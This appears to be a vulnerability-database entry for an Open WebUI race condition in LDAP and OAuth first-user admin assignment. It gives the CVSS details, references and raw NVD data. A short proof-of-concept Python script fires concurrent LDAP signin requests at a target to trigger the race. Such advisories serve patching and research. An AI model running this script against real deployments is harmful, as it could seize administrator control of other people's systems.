CVE-2026-45675

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, he LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment "Insert with default role first to avoid TOCTOU race", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import threading

# Target URL (Example)
url = "http://target-open-webui.com/api/v1/auths/signin/ldap"
payload = {
    "username": "attacker",
    "password": "password123"
}

def make_request():
    try:
        response = requests.post(url, json=payload)
        print(f"Status: {response.status_code}, Response: {response.text}")
    except Exception as e:
        print(e)

# Simulate Race Condition
threads = []
for i in range(10):
    t = threading.Thread(target=make_request)
    threads.append(t)
    t.start()

for t in threads:
    t.join()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45675
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45675
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45675/
[4] VulDB https://vuldb.com/cve/CVE-2026-45675
[5] https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec
[6] https://github.com/open-webui/open-webui/pull/23626
[7] https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3
[8] https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45675", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:49.220", "lastModified": "2026-05-15T21:16:38.647", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, he LDAP and OAuth authentication flows use a TOCTOU (Time-of-Check-Time-of-Use) pattern for first-user admin role assignment. The regular signup handler (signup_handler in auths.py, line 663) was explicitly patched to prevent this race with the comment \"Insert with default role first to avoid TOCTOU race\", but the LDAP and OAuth code paths were never updated with the same fix. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-362"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/commit/96a0b3239b1aadb23fc359bf10849c9ba12fd6ec", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/pull/23626", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-h3ww-q6xx-w7x3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}